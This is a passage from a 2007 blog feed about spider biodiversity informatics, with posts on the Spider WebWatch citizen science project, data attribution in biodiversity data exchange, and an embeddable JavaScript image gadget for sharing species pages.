This is sadly lacking and we need real-world reasons or examples for making use of GUIDs and not merely name strings.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8168440459126488504?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8168440459126488504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8168440459126488504' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8168440459126488504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8168440459126488504'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/biodiversity-informatics-relevance.html' title='Biodiversity Informatics relevance'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7377592608090583409</id><published>2007-04-27T18:02:00.000-06:00</published><updated>2007-10-25T13:38:40.741-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='citizen science'/><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Citizen Science...spider style</title><content type='html'>&lt;div&gt;I have been developing The Nearctic Spider Database for a number of years now. 
All the nomenclature, database, and web page development are under my purview, but individuals who have demonstrated some form of expertise in spider systematics, biogeography, etc. have the option to author and/or review species pages. They can upload imagery, select references, add descriptions, plus a number of other functions all via the website. These productions are then open for review in the very traditional sense. Once three reviews have been received and the author has made any changes suggested by the anonymous reviewers, I receive notice, flick the switch, and the species page is tagged "Peer reviewed" then locked against further editing. However, all point collection maps, other taxonomic references, lists of synonyms &amp;amp; chresonyms, and a phenological chart are dynamically created and may change with additional data from the specimen side of the database.&lt;br /&gt;&lt;br /&gt;Since this sort of "expert" authoring/reviewing cut off all options for the casual browser of these pages to contribute, I created a "drop a comment" feature whereby anyone and everyone may write a casual comment on a species, a sighting report, etc. in a manner much like leaving a comment on someone else's blog post. 
Response to this new feature has been fairly good so, at the request of a few contributors to the database, I created "&lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt;" - a citizen science initiative for anyone and everyone to submit observations on spiders they see in their backyard and elsewhere.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;a href="http://www.spiderwebwatch.org"&gt;&lt;img id="BLOGGER_PHOTO_ID_5058536900018753202" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RjOIgmDSzrI/AAAAAAAAAAM/b0Vdux2ka1s/s320/Logo_large.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Granted, there is no way to track misidentifications, nomenclatural changes following a revision, or the other issues that plague or otherwise bring into question the longevity and utility of the data in scientific research, but the point of Spider WebWatch is for anyone to contribute. The hope is that this fosters a more pervasive interest in spider biodiversity research...sort of like a gateway or an introduction to araneology. To limit some of the issues with observational data, there are only 9 species in Spider WebWatch. A &lt;a href="http://www.canadianarachnology.org/forum/viewtopic.php?t=157"&gt;discussion&lt;/a&gt; in The Nearctic Arachnologists' Forum helped choose these 9 species.&lt;br /&gt;&lt;br /&gt;I took the "drop a comment" feature on species pages in The Nearctic Spider Database to a much more interactive level: "WebWatchers" in Spider WebWatch can not only upload an observation with an image but also comment on anyone else's observation, thus building threads of discussion in a manner very much like a forum. A contributor may edit their observations or comments at any time and the system for contributing an observation is stripped down to the bare minimum. 
It was brought to my attention that a web form with too many fields or boxes to tick/fill is overwhelming.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;So, try out Spider WebWatch. I also have a poll underway to get some feedback on the possibility of using a web-enabled mobile phone to submit an observation.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7377592608090583409?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7377592608090583409/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7377592608090583409' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7377592608090583409'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7377592608090583409'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/citizen-sciencespider-style.html' title='Citizen Science...spider style'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RjOIgmDSzrI/AAAAAAAAAAM/b0Vdux2ka1s/s72-c/Logo_large.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4111161495166279965</id><published>2007-04-27T16:34:00.000-06:00</published><updated>2007-10-06T14:39:43.769-06:00</updated><title type='text'>Client-orchestrated 
Data Repurposing</title><content type='html'>A lot of work is underway by various working groups within &lt;a href="http://www.tdwg.org/"&gt;TDWG&lt;/a&gt; to connect one machine to another for intelligent data exchange systems. For example, &lt;a href="http://digir.sourceforge.net/"&gt;DiGIR&lt;/a&gt; and BioCASE (soon to be superseded by &lt;a href="http://wiki.tdwg.org/twiki/bin/view/TAPIR/"&gt;TAPIR&lt;/a&gt;) are nifty systems that create on-the-fly XML documents whose data can be dumped into other databases. This of course is all behind-the-scenes with no direct benefit to providers of biodiversity data except, I suppose, a demonstration to administrators that they have contributed to the greater good. Eventually, somewhere down the line, there may be some sort of attribution but there's no guarantee.&lt;br /&gt;&lt;br /&gt;GBIF does a great job of maintaining attribution because the ultimate goal is to permit someone who uses their website to discover where a specimen can be found &amp;amp; to contact the curator. However, there's nothing stopping anyone from aggregating data from DiGIR providers and repurposing it without any sort of attribution or "link" back to the provider. In other words, an institution could potentially have to cough up a lot of funds to keep the bandwidth pipes flowing without seeing any immediate value in return. These sorts of thoughts fly in the face of open access. Don't get me wrong, I'm all for open access, I'm just not certain if such a model for aggregating biodiversity data in museums and elsewhere is sustainable. What is needed at the very least is an auditing &amp;amp; logging tool associated with DiGIR (or TAPIR) such that providers of biodiversity data may collect data on who used their resource, what was downloaded and what traffic patterns have been like over 'x' number of days, weeks, months, etc. 
But, I know of no such add-on for DiGIR or BioCASE providers.&lt;br /&gt;&lt;br /&gt;So, I have been looking into alternative means to share resources and have played around with various ideas. One such idea takes the form of gadgets to share imagery. There are a ton of really useful images of immense biological value and when these are shared around, it becomes impossible to know where the original image was first made available and who provided it. One could use meta tags and embed that data within the image, but who does that? If there were a browser-based meta tag reader for images for web programmers to tap into, then meta tags would be an obvious choice. However, I'm not aware of any browser plug-in that can do that. So, here's a gadget script that can be copied and pasted onto a web site:&lt;br /&gt;&lt;br /&gt;&lt;form name="gadget"&gt;&lt;textarea name="gadgetcopy"  rows="10" cols="50" size="30"&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?species=18655&amp;amp;imagetype=habitus&amp;amp;title_color=%23000000&amp;amp;w=450&amp;amp;h=301&amp;amp;s=yes&amp;amp;border=none+2px+%23000066"&gt;&lt;/script&gt;&lt;/textarea&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;And here's the result:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?species=18655&amp;amp;imagetype=habitus&amp;amp;title_color=%23000000&amp;amp;w=450&amp;amp;h=301&amp;amp;s=yes&amp;amp;border=none+2px+%23000066"&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;The gadget itself is dynamically-created JavaScript that pulls all the bits from the Nearctic Spider Database. The species nomenclature, attribution, and link to the species page are automatic &amp;amp; could change should I change anything in the database. These changes would of course cascade through all instances of the script wherever these may be. 
The individual who "made" the gadget can however pretty it up as they might like through a little configuration tool I have. Feel free to mess with that by clicking a "Link it" button here: &lt;a href="http://www.canadianarachnology.org/data/spiders/18655"&gt;http://canadianarachnology.dyndns.org/data/spiders/18655&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Something like this gadget system is by no means rocket science but has immediate value to the provider and the individual wishing to repurpose it for their web site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4111161495166279965?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4111161495166279965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4111161495166279965' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4111161495166279965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4111161495166279965'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/client-orchestrated-data-repurposing.html' title='Client-orchestrated Data Repurposing'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8477452678869409402</id><published>2007-04-26T17:36:00.000-06:00</published><updated>2007-10-06T14:40:37.092-06:00</updated><title type='text'>Inaugural 
Post</title><content type='html'>I'm a latecomer to the blog scene so thought I'd try my hand at it.&lt;br /&gt;&lt;br /&gt;This blog will include bits that have fallen off the wagon as it were while developing &lt;a href="http://www.canadianarachnology.org"&gt;The Canadian Arachnologist&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/forum/"&gt;The Nearctic Arachnologists' Forum&lt;/a&gt; and &lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt;. The latter is a citizen science initiative that accepts observation data on 9 ambassador species in North America. I have a strong interest in federating biological data so there will undoubtedly be posts about nomenclatural management, species concepts, data aggregation techniques and the like.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8477452678869409402?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8477452678869409402/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8477452678869409402' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8477452678869409402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8477452678869409402'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/inaugural-post.html' title='Inaugural Post'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry></feed>
